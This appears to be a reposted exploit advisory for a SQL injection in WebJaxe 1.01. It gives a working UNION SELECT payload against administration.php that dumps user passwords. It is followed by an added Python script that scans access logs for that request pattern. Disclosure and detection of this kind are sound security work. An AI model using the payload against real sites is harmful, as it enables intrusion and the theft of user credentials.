WebJaxe 1.01 remote SQL injection

2010-05-19 / 2010-05-20
Credit: IHTeam
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

###############################################################################
#
# Exploit Title: WebJaxe Sql Injection
# Date: 14-05-2010
# Author: IHTeam
# Software Link: http://media4.obspm.fr/outils/webjaxe/en/
# Version: 1.01
# Tested on: Win/Linux
#
###############################################################################

!You need a registered user!

http://[site]/[path]/php/partie_administrateur/administration.php?page=projet_contribution&id_contribution=[SQL]

Example (Show username:password):
http://localhost/webjaxe/php/partie_administrateur/administration.php?page=projet_contribution&id_contribution=-1/**/UNION/**/ALL/**/SELECT/**/1,concat(prenom,char(58),motdepasse),3,4,5,6/**/FROM/**/utilisateurs
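A log check for the request pattern in this advisory, added here as an example (it is not part of the original advisory or of WebJaxe): it flags requests to administration.php whose id_contribution value is not a plain integer. The Common Log Format layout, the sample lines and the assumption that legitimate IDs are numeric are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Endpoint and parameter taken from the advisory above.
ENDPOINT = "/php/partie_administrateur/administration.php"
PARAM = "id_contribution"
# Assumption: a legitimate id_contribution is a plain non-negative integer.
VALID_ID = re.compile(r"\d{1,10}")
# Client address and request target of a Common Log Format line.
LOG_LINE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

BASE = "/webjaxe" + ENDPOINT + "?page=projet_contribution&" + PARAM + "="
# Constructed sample log lines (documentation IP ranges, not real traffic).
# Line 2 carries the start of the advisory's example value, line 3 a
# percent-encoded form of it, line 4 the same parameter on another script.
SAMPLE_LOG = [
    f'192.0.2.10 - - [14/May/2010:10:01:02 +0200] "GET {BASE}42 HTTP/1.1" 200 5120',
    f'198.51.100.7 - - [14/May/2010:10:03:15 +0200] "GET {BASE}'
    '-1/**/UNION/**/ALL/**/SELECT/**/1 HTTP/1.1" 200 7301',
    f'198.51.100.7 - - [14/May/2010:10:03:40 +0200] "GET {BASE}'
    '-1%2F%2A%2A%2FUNION HTTP/1.1" 200 7301',
    '192.0.2.10 - - [14/May/2010:10:05:00 +0200] '
    '"GET /webjaxe/index.php?id_contribution=abc HTTP/1.1" 200 900',
]


def check_line(line):
    """Return (client, decoded_value) pairs for non-integer id_contribution values."""
    m = LOG_LINE.match(line)
    if not m:
        return []
    client, target = m.groups()
    url = urlsplit(target)
    if not url.path.endswith(ENDPOINT):
        return []
    hits = []
    for raw in parse_qs(url.query).get(PARAM, []):
        value = unquote(raw)  # parse_qs decoded once; undo a second layer of encoding
        if not VALID_ID.fullmatch(value):
            hits.append((client, value))
    return hits


def scan(lines):
    """Scan an iterable of log lines; return (line_number, client, value) findings."""
    return [(n, c, v) for n, line in enumerate(lines, 1) for c, v in check_line(line)]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Only parameters sent in the query string appear in an access log, so this covers the GET form shown in the advisory.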



Copyright 2024, cxsecurity.com

 
